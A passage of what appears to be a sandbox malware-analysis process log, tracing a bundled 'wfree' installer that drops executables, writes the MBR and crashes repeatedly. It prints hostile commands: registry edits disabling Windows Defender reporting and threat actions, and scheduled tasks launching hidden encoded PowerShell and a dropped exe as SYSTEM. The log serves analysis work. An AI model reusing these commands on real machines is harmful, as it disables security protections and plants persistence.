                                                                                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                                                                                    9⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:1512
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
                                                                                7⤵
                                                                                  PID:4736
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                                                                                    8⤵
                                                                                      PID:2624
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                                                                                        9⤵
                                                                                          PID:884
                                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                                          9⤵
                                                                                            PID:3960
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /CREATE /TN "gHlDNxXeG" /SC once /ST 08:21:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                        7⤵
                                                                                        • Creates scheduled task(s)
                                                                                        PID:4368
                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                        schtasks /run /I /tn "gHlDNxXeG"
                                                                                        7⤵
                                                                                          PID:4660
                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                          schtasks /DELETE /F /TN "gHlDNxXeG"
                                                                                          7⤵
                                                                                            PID:968
                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                            schtasks /CREATE /TN "bQVIyCuucUjqxTYLAY" /SC once /ST 16:21:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\xiEkNlOfzcWZMyi\hSziFol.exe\" 3T /site_id 757674 /S" /V1 /F
                                                                                            7⤵
                                                                                            • Drops file in Windows directory
                                                                                            • Creates scheduled task(s)
                                                                                            PID:4608
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1708
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:5092
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1952
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:4428
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1812
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:372
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1776
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:3980
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 2028
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:1808
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1944
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:3728
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1948
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:2232
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1788
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:4060
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1828
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:224
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 792
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:4564
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1944
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:4548
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 2024
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:224
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1860
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:784
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2324 -s 1812
                                                                                      4⤵
                                                                                      • Program crash
                                                                                      PID:4220
                                                                              • C:\Users\Admin\Documents\w1free.rar_id20808554.exe
                                                                                "C:\Users\Admin\Documents\w1free.rar_id20808554.exe"
                                                                                1⤵
                                                                                • Executes dropped EXE
                                                                                • Writes to the Master Boot Record (MBR)
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of SetWindowsHookEx
                                                                                PID:4276
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                1⤵
                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                PID:5092
                                                                                • C:\Windows\system32\gpupdate.exe
                                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                                  2⤵
                                                                                    PID:904
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                  1⤵
                                                                                    PID:3824
                                                                                  • \??\c:\windows\system32\svchost.exe
                                                                                    c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                    1⤵
                                                                                      PID:2600
                                                                                    • C:\Windows\system32\gpscript.exe
                                                                                      gpscript.exe /RefreshSystemParam
                                                                                      1⤵
                                                                                        PID:2240
                                                                                      • C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe
                                                                                        "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"
                                                                                        1⤵
                                                                                          PID:3644
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-FNNEC.tmp\is-L3J6H.tmp
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-FNNEC.tmp\is-L3J6H.tmp" /SL4 $502B8 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 52224
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • Loads dropped DLL
                                                                                            • Drops file in Program Files directory
                                                                                            PID:4964
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "C:\Windows\system32\schtasks.exe" /Query
                                                                                              3⤵
                                                                                                PID:2224
                                                                                              • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                                                "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"
                                                                                                3⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2832
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 852
                                                                                                  4⤵
                                                                                                  • Program crash
                                                                                                  PID:4544
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 864
                                                                                                  4⤵
                                                                                                  • Program crash
                                                                                                  PID:3088
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2832 -s 256
                                                                                                  4⤵
                                                                                                  • Program crash
                                                                                                  PID:2204
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                "C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"
                                                                                                3⤵
                                                                                                  PID:1032
                                                                                                • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                                                  "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d536
                                                                                                  3⤵
                                                                                                  • Executes dropped EXE
                                                                                                  PID:3172
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3172 -s 672
                                                                                                    4⤵
                                                                                                    • Program crash
                                                                                                    PID:1980
                                                                                            • C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe
                                                                                              "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"
                                                                                              1⤵
                                                                                                PID:2436
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-DQEUK.tmp\is-OI5G3.tmp
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-DQEUK.tmp\is-OI5G3.tmp" /SL4 $60276 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 52224
                                                                                                  2⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • Loads dropped DLL
                                                                                                  • Drops file in Program Files directory
                                                                                                  PID:1668
                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                    "C:\Windows\system32\schtasks.exe" /Query
                                                                                                    3⤵
                                                                                                      PID:1640
                                                                                                    • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                                                      "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"
                                                                                                      3⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:160
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 160 -s 768
                                                                                                        4⤵
                                                                                                        • Program crash
                                                                                                        PID:4560
                                                                                                • C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe
                                                                                                  "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"
                                                                                                  1⤵
                                                                                                    PID:4680
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-Q3P1T.tmp\is-VHAAD.tmp
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-Q3P1T.tmp\is-VHAAD.tmp" /SL4 $8036A "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 52224
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:3272
                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                        "C:\Windows\system32\schtasks.exe" /Query
                                                                                                        3⤵
                                                                                                          PID:2564
                                                                                                        • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                                                          "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"
                                                                                                          3⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:880
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 852
                                                                                                            4⤵
                                                                                                            • Program crash
                                                                                                            PID:3068
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 864
                                                                                                            4⤵
                                                                                                            • Program crash
                                                                                                            PID:4500
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 880 -s 228
                                                                                                            4⤵
                                                                                                            • Program crash
                                                                                                            PID:3004
                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                          "C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"
                                                                                                          3⤵
                                                                                                            PID:1848
                                                                                                          • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                                                            "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d536
                                                                                                            3⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:64
                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 64 -s 240
                                                                                                              4⤵
                                                                                                              • Program crash
                                                                                                              PID:4204
                                                                                                      • C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe
                                                                                                        "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"
                                                                                                        1⤵
                                                                                                          PID:3836
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-8JUDL.tmp\is-CLNR1.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-8JUDL.tmp\is-CLNR1.tmp" /SL4 $70374 "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 52224
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Drops file in Program Files directory
                                                                                                            PID:4564
                                                                                                            • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                                                              "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"
                                                                                                              3⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:3816
                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                              "C:\Windows\system32\schtasks.exe" /Query
                                                                                                              3⤵
                                                                                                                PID:2064
                                                                                                              • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                                                                "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d536
                                                                                                                3⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:3560
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3560 -s 680
                                                                                                                  4⤵
                                                                                                                  • Program crash
                                                                                                                  PID:3296
                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                "C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"
                                                                                                                3⤵
                                                                                                                  PID:4768
                                                                                                            • C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe
                                                                                                              "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"
                                                                                                              1⤵
                                                                                                                PID:3556
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-4H2SM.tmp\is-2VSFS.tmp
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-4H2SM.tmp\is-2VSFS.tmp" /SL4 $6027A "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 52224
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Loads dropped DLL
                                                                                                                  • Drops file in Program Files directory
                                                                                                                  PID:4456
                                                                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                    "C:\Windows\system32\schtasks.exe" /Query
                                                                                                                    3⤵
                                                                                                                      PID:1892
                                                                                                                    • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                                                                      "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"
                                                                                                                      3⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:1560
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1560 -s 768
                                                                                                                        4⤵
                                                                                                                        • Program crash
                                                                                                                        PID:4272
                                                                                                                • C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe
                                                                                                                  "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe"
                                                                                                                  1⤵
                                                                                                                    PID:4780
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-86C5N.tmp\is-T5169.tmp
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-86C5N.tmp\is-T5169.tmp" /SL4 $3013C "C:\Users\Admin\Desktop\wfree_dHuvCz9m.exe" 5198354 52224
                                                                                                                      2⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Drops file in Program Files directory
                                                                                                                      PID:1472
                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                        "C:\Windows\system32\schtasks.exe" /Query
                                                                                                                        3⤵
                                                                                                                          PID:3728
                                                                                                                        • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                                                                          "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe"
                                                                                                                          3⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:4852
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          "C:\Windows\system32\schtasks.exe" /Delete /F /TN "CloneRemover 3.9"
                                                                                                                          3⤵
                                                                                                                            PID:3344
                                                                                                                          • C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe
                                                                                                                            "C:\Program Files (x86)\TEMole Clone Remover 4.11\CloneRemover.exe" c322aa8acb58a24b92f7268bee04d536
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:1572
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\xiEkNlOfzcWZMyi\hSziFol.exe
                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jeUhSkFkkIbgydTZa\xiEkNlOfzcWZMyi\hSziFol.exe 3T /site_id 757674 /S
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Drops file in System32 directory
                                                                                                                        PID:4236
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                                                                                                                          2⤵
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4608
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                            3⤵
                                                                                                                              PID:4568
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                                                4⤵
                                                                                                                                  PID:1424
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:2628
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:1980
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:1800
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:4964
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:428
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:2240
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:1816
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:368
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:4540
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:1092
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:4892
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:1908
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4296
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:804
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4692
                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4780
                                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
